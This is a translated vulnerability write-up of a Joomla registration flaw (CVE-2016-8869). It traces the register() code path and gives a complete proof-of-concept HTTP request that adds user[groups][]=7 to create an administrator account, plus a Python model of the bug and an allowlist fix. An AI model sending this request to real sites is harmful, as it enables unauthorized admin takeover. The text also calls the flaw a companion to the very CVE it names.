Joomla create a privileged user exploit analysis (CVE-2016-8869) - vulnerability warning - the black bar safety net

2016-12-01T00:00:00
ID MYHACK58:62201681701
Type myhack58
Reporter Anonymous
Modified 2016-12-01T00:00:00

Description

Vulnerability environment

Joomla versions 3.4.4 to 3.6.3

Vulnerability description

This vulnerability is a companion piece to CVE-2016-8869, but compared with 8869 its idea is more ingenious and more interesting. Its nature is also almost the same as that of 8869: both appear in the user login and registration code.

Vulnerability analysis

The entire vulnerability is similar to the earlier 8869 one: it also lies in components/com_users/controllers/user.php, in UsersControllerUser::register().

Request packet

First, we use a request packet to walk through the whole registration process handled by UsersControllerUser::register().

```http
POST /joomla/index.php/component/users/?task=registration.register HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: EN-us,EN;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/joomla/index.php/component/users/?view=registration
Cookie: 【COOKIE】
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------596020006637
Content-Length: 1036

-----------------------------596020006637
Content-Disposition: form-data; name="user[name]"

spoock
-----------------------------596020006637
Content-Disposition: form-data; name="user[username]"

spoock
-----------------------------596020006637
Content-Disposition: form-data; name="user[password1]"

123456
-----------------------------596020006637
Content-Disposition: form-data; name="user[password2]"

123456
-----------------------------596020006637
Content-Disposition: form-data; name="user[email1]"

1@123.com
-----------------------------596020006637
Content-Disposition: form-data; name="user[email2]"

1@123.com
-----------------------------596020006637
Content-Disposition: form-data; name="option"

com_users
-----------------------------596020006637
Content-Disposition: form-data; name="task"

user.register
-----------------------------596020006637
Content-Disposition: form-data; name=【TOKEN】

1
-----------------------------596020006637--
```

The COOKIE and TOKEN marked with 【】 must be filled in by the user; how to obtain these two values was described in detail in the previous article and is not repeated here.

register()

The above POST request is processed by UsersControllerUser::register() in components/com_users/controllers/user.php. ![](http://7xrnu9.com1.z0.glb.clouddn.com/joomla-cve-8869/1.png) The program runs to $model->register($data), where $data is the user array taken from the POST data.

register($temp)

Following $model->register($data) leads to UsersModelRegistration::register($temp) in components/com_users/models/registration.php. ![](http://7xrnu9.com1.z0.glb.clouddn.com/joomla-cve-8869/2.png) Before the foreach loop over $temp there is the statement

```php
$data = (array) $this->getData();
```

This fills the $data variable before the values from $temp are copied into it, so $data already has content, including the data that identifies the user type. ![](http://7xrnu9.com1.z0.glb.clouddn.com/joomla-cve-8869/3.png) As shown above, the groups array holds the value 2, which identifies this user as an ordinary user.

Successful registration

At the end of the whole process, an ordinary user is registered. ![](http://7xrnu9.com1.z0.glb.clouddn.com/joomla-cve-8869/4.png)

PoC

Knowing that the groups array identifies the user's group, we can add a groups array directly to the POST data with its value set to Administrator (7 in Joomla), and an administrator user is created.

POST data

```http
POST /joomla/index.php/component/users/?task=registration.register HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: EN-us,EN;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/joomla/index.php/component/users/?view=registration
Cookie: 【COOKIE】
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------596020006637
Content-Length: 1125

-----------------------------596020006637
Content-Disposition: form-data; name="user[name]"

spoock
-----------------------------596020006637
Content-Disposition: form-data; name="user[username]"

spoock
-----------------------------596020006637
Content-Disposition: form-data; name="user[password1]"

123456
-----------------------------596020006637
Content-Disposition: form-data; name="user[password2]"

123456
-----------------------------596020006637
Content-Disposition: form-data; name="user[email1]"

1@123.com
-----------------------------596020006637
Content-Disposition: form-data; name="user[email2]"

1@123.com
-----------------------------596020006637
Content-Disposition: form-data; name="user[groups][]"

7
-----------------------------596020006637
Content-Disposition: form-data; name="option"

com_users
-----------------------------596020006637
Content-Disposition: form-data; name="task"

user.register
-----------------------------596020006637
Content-Disposition: form-data; name=【TOKEN】

1
-----------------------------596020006637--
```
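The register() flow traced above (getData() defaults first, then every submitted user[...] key overwriting them) and the PoC body, reproduced as an added Python example; this is not Joomla's code or the author's. The multipart parser, the ALLOWED_USER_FIELDS allowlist and the shortened POC_BODY are constructed for this example; register_merge() shows the page's bug with allowlist=None and the field-allowlist fix that keeps the default group.

```python
import re

# Fields the stock registration form submits under user[...] (taken from the page's request).
# Constructed allowlist for this example; Joomla's real fix validates against its XML form.
ALLOWED_USER_FIELDS = {"name", "username", "password1", "password2", "email1", "email2"}
BOUNDARY = "---------------------------596020006637"

# Constructed, shortened copy of the page's PoC body; the user[groups][] part is the attack.
POC_BODY = "\r\n".join([
    "--" + BOUNDARY, 'Content-Disposition: form-data; name="user[username]"', "", "spoock",
    "--" + BOUNDARY, 'Content-Disposition: form-data; name="user[groups][]"', "", "7",
    "--" + BOUNDARY, 'Content-Disposition: form-data; name="task"', "", "user.register",
    "--" + BOUNDARY + "--",
])


def parse_multipart(body: str, boundary: str) -> list:
    """Return (field name, value) pairs from a multipart/form-data body."""
    fields = []
    for part in body.split("--" + boundary):
        part = part.strip("\r\n")
        if not part or part == "--":          # preamble or closing delimiter
            continue
        headers, _, value = part.partition("\r\n\r\n")
        match = re.search(r'name="([^"]*)"', headers)
        if match:
            fields.append((match.group(1), value))
    return fields


def user_array(fields: list) -> dict:
    """Build the user[...] array the way PHP does: user[k]=v sets, user[k][]=v appends."""
    user = {}
    for name, value in fields:
        match = re.fullmatch(r"user\[([^\]]+)\](\[\])?", name)
        if not match:
            continue
        key, is_list = match.group(1), bool(match.group(2))
        if is_list:
            user.setdefault(key, []).append(value)
        else:
            user[key] = value
    return user


def register_merge(submitted: dict, allowlist=None) -> dict:
    """Mirror of UsersModelRegistration::register(): defaults first, then submitted keys
    overwrite. allowlist=None copies every key (the bug); an allowlist drops user groups."""
    data = {"groups": ["2"]}                  # default group from getData(), as the page shows
    for key, value in submitted.items():
        if allowlist is None or key in allowlist:
            data[key] = value
    return data
```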
